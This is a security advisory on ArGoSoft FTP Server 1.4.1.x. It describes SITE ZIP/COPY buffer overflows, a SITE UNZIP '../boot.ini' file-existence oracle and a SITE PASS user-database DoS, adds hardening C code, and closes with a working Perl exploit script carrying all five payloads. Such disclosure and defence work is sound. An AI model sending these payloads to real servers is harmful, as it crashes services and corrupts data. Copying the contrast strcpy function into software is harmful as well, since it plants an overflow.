ArGoSoft FTP Server Multiple Vulnerabilities (SITE ZIP, UNZIP, COPY, PASS)

Summary

STORM has discovered multiple security vulnerabilities in ArGoSoft's FTP Server:

1) Three allow overflowing an internal buffer – Buffer Overflows

2) One allows discovering whether a file exists on a server (files that reside outside the bound FTP root directory) – File Disclosure

3) Another one allows causing a DoS by overwriting critical parts of the user database file (by the password change mechanism) in such a way that the user database is no longer usable – Denial of Service

Credit:

SecuriTeam would like to thank STORM for finding this vulnerability.


Details

Vulnerable Systems:
 * ArGoSoft version 1.4.1.4 and prior
 * ArGoSoft version 1.4.1.5

Immune Systems:
 * ArGoSoft version 1.4.1.6

Buffer Overflows:
The first two vulnerabilities revolve around the SITE ZIP command: its parameters are not checked for length, so an over-long argument overflows the internal buffer the command uses. The first is triggered by sending 'SITE ZIP ' followed by 512 'A' characters; the second by sending 'SITE ZIP storm.zip /f:' followed by 2048 'A' characters. The third buffer overflow is in the SITE COPY command; to reproduce it, send 'SITE COPY ' followed by 2048 'A' characters, a space, and 10 'A' characters. All three are reachable only after a successful login, but any valid account suffices.

File Disclosure:
The file disclosure vulnerability is in the SITE UNZIP command. Its parameter names the file to unzip, and because '../' sequences in it are not filtered, the existence of files outside the FTP root directory can be verified: the server's response to 'SITE UNZIP ../boot.ini' (a file known to exist on a Windows system drive) differs from its response to 'SITE UNZIP ../notthere.ini', so the command acts as a file-existence oracle for the whole filesystem.
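The check that closes this class of bug is to validate the client-supplied path against the FTP root before the filesystem is touched, so that no server response can act as an existence oracle for files outside the root. The following C example is added here and is not ArGoSoft's code: the root path, the function names and the lexical normalization rules are assumptions for illustration. It rejects '../' climbs, absolute paths, backslash separators and drive-letter prefixes (the server in this advisory runs on Windows); on a real server the lexical check should be followed by canonicalization of the final path so that junctions and symlinks cannot bypass it.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Returns true if a client-supplied relative path would leave the FTP root
 * once "." and ".." segments are resolved lexically.  Absolute paths, drive
 * letters ("C:...") and anything starting with a separator are rejected too.
 * Purely lexical: canonicalise the final path as well before opening it. */
bool path_escapes_root(const char *path)
{
    size_t depth = 0;                       /* directories below the root */
    if (path == NULL) return true;
    if (path[0] == '/' || path[0] == '\\') return true;
    if (path[0] != '\0' && path[1] == ':') return true;   /* drive letter */

    const char *p = path;
    while (*p) {
        const char *seg = p;
        while (*p && *p != '/' && *p != '\\') p++;
        size_t len = (size_t)(p - seg);
        if (*p) p++;                        /* skip the separator */
        if (len == 0 || (len == 1 && seg[0] == '.')) continue;
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (depth == 0) return true;    /* would climb above the root */
            depth--;
            continue;
        }
        depth++;
    }
    return false;
}

/* Hardened SITE UNZIP target resolution (illustrative).  Builds root/path
 * into out only when the path stays inside the root.  Returns 0 on success
 * and -1 when the request is rejected or the result does not fit; the
 * caller answers a rejection with one fixed error before any stat/open, so
 * the reply cannot reveal whether ../boot.ini exists. */
int site_unzip_target(const char *root, const char *path, char *out, size_t outsz)
{
    if (path_escapes_root(path)) return -1;
    int n = snprintf(out, outsz, "%s/%s", root, path);
    if (n < 0 || (size_t)n >= outsz) return -1;
    return 0;
}

int main(void)
{
    /* Constructed probes, including the two used in the advisory. */
    const char *probes[] = { "storm.zip", "../boot.ini", "../notthere.ini",
                             "pub/../../boot.ini", "..\\boot.ini", "C:\\boot.ini" };
    char out[128];
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int rc = site_unzip_target("C:/ftproot", probes[i], out, sizeof out);
        printf("%-20s -> %s\n", probes[i], rc == 0 ? out : "550 rejected");
    }
    return 0;
}
```

Note that '../boot.ini' and '../notthere.ini' now produce the identical rejection, which is what removes the oracle; a server that only hides the error after trying to open the file still leaks timing and sometimes error-code differences.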

Denial of Service:
The denial of service vulnerability is in the SITE PASS command, whose second parameter is the new password. Supplying a very long password (the exploit below uses 3500 characters) causes the server to overwrite critical parts of the user database file, leaving it corrupt and unusable; since the password change is available to any authenticated user, a single low-privileged account can lock out everyone.
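The three overflows above and the SITE PASS corruption share one root cause: an argument of a SITE command is copied into a fixed-size buffer, or written into a fixed-width database record, without its length being checked first. The following C example is added here and is not the vendor's code; the limits `SITE_ARG_MAX` and `PASSWORD_MAX`, the function names and the test inputs are assumptions for illustration, since the advisory reports only the payload lengths that trigger the faults (512, 2048 and 3500 bytes), not the server's real buffer sizes. It places the unbounded copy beside a bounded one that refuses over-long input before anything is written.

```c
#include <stdio.h>
#include <string.h>

/* Illustrative limits, not the real server's. */
#define SITE_ARG_MAX 255
#define PASSWORD_MAX  64

/* Length of s, reading at most max+1 bytes.  Returns max+1 when s is longer
 * than max, so an unterminated or huge argument is never walked to its end. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n <= max && s[n] != '\0') n++;
    return n;
}

/* Copy an untrusted SITE argument into dst (capacity dstsz) only if it fits
 * together with its terminator.  Returns 0 on success, -1 when rejected; on
 * rejection dst is left untouched. */
int copy_site_arg(char *dst, size_t dstsz, const char *arg)
{
    size_t len = bounded_len(arg, dstsz);
    if (dstsz == 0 || len >= dstsz) return -1;
    memcpy(dst, arg, len + 1);
    return 0;
}

/* The vulnerable pattern behind "SITE ZIP " . 'A' x 512: an unbounded strcpy
 * into a fixed buffer.  Kept for contrast only; never call it on untrusted
 * input (it overflows as soon as strlen(arg) > SITE_ARG_MAX). */
void site_zip_vulnerable(const char *arg)
{
    char name[SITE_ARG_MAX + 1];
    strcpy(name, arg);
    printf("zipping %s\n", name);
}

/* Hardened SITE ZIP <zipname> [/f:<filespec>]: every argument goes through
 * copy_site_arg before use.  Returns 0 when all were accepted, -1 otherwise. */
int site_zip_checked(const char *zipname, const char *filespec)
{
    char zipbuf[SITE_ARG_MAX + 1], filebuf[SITE_ARG_MAX + 1];
    if (copy_site_arg(zipbuf, sizeof zipbuf, zipname) != 0) return -1;
    if (filespec && copy_site_arg(filebuf, sizeof filebuf, filespec) != 0) return -1;
    return 0;
}

/* Hardened SITE COPY <src> <dst>. */
int site_copy_checked(const char *src, const char *dst)
{
    char srcbuf[SITE_ARG_MAX + 1], dstbuf[SITE_ARG_MAX + 1];
    if (copy_site_arg(srcbuf, sizeof srcbuf, src) != 0) return -1;
    if (copy_site_arg(dstbuf, sizeof dstbuf, dst) != 0) return -1;
    return 0;
}

/* Hardened SITE PASS: the new password is length-checked against the record
 * width before anything is written to the user database, so an over-long
 * value is answered with an error instead of corrupting the file. */
int site_pass_checked(const char *newpw, char *stored, size_t storedsz)
{
    if (storedsz > PASSWORD_MAX + 1) storedsz = PASSWORD_MAX + 1;
    return copy_site_arg(stored, storedsz, newpw);
}

int main(void)
{
    char big[3501];                         /* constructed 'A' x 3500 payload */
    memset(big, 'A', 3500);
    big[3500] = '\0';
    char pw[PASSWORD_MAX + 1];

    printf("SITE ZIP storm.zip      -> %d\n", site_zip_checked("storm.zip", NULL));
    printf("SITE ZIP A*3500         -> %d\n", site_zip_checked(big, NULL));
    printf("SITE COPY A*3500 A*10   -> %d\n", site_copy_checked(big, "AAAAAAAAAA"));
    printf("SITE PASS storm A*3500  -> %d\n", site_pass_checked(big, pw, sizeof pw));
    return 0;
}
```

The point of `bounded_len` is that the length check itself must be bounded: measuring an attacker-controlled string with `strlen` before a copy still scans the entire payload, which is harmless for a 3500-byte line but not for a server that reads commands into a fixed line buffer without a terminator.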

Solution:
Upgrade to the latest version of ArGoSoft FTP Server.

Vendor response:
The vendor was very responsive and fixed the issues within 48 hours; the newest version (1.4.1.6) fixes the above vulnerabilities and is available from the vendor's web site.

Exploit (for all the vulnerabilities):
#!/usr/bin/perl
# Multiple Vulnerabilities in ArGoSoft FTP Server version 1.4 (1.4.1.4)
# Created by Beyond Security Ltd. - All rights reserved.

use strict;
use warnings;
use IO::Socket;

my $host = '192.168.1.243';   # target server
my $port = 2119;              # port the test instance listened on (the FTP default is 21)

my $remote = IO::Socket::INET->new(
    Proto    => 'tcp',
    PeerAddr => $host,
    PeerPort => $port,
);

unless ($remote) { die "cannot connect to ftp daemon on $host:$port\n" }

print "connected\n";

# Read the banner up to the "220 " greeting.
while (<$remote>) {
    print $_;
    last if /220 /;
}

$remote->autoflush(1);

# Log in; the SITE commands are only reachable after authentication,
# but any valid account will do.
my $ftp = "USER username\r\n";
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>) {
    print $_;
    last if /331 /;
}

$ftp = join('', 'PASS ', 'password', "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>) {
    print $_;
    last if /230 /;
}

# Choose one of the following to test the vulnerability mentioned:
#$ftp = join('', 'SITE ZIP ', 'A' x 512, "\r\n");                   # buffer overflow 1
#$ftp = join('', 'SITE ZIP storm.zip /f:', 'A' x 2048, "\r\n");     # buffer overflow 2
#$ftp = join('', 'SITE COPY ', 'A' x 2048, ' ', 'A' x 10, "\r\n");  # buffer overflow 3
#$ftp = join('', 'SITE UNZIP ', '../boot.ini', "\r\n");             # directory traversal (we know this file exists)
#$ftp = join('', 'SITE PASS ', 'storm ', 'A' x 3500, "\r\n");       # DoS against the user database

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>) {
    print $_;
    last if /250 Done/;
}

close $remote;

Categories: Windows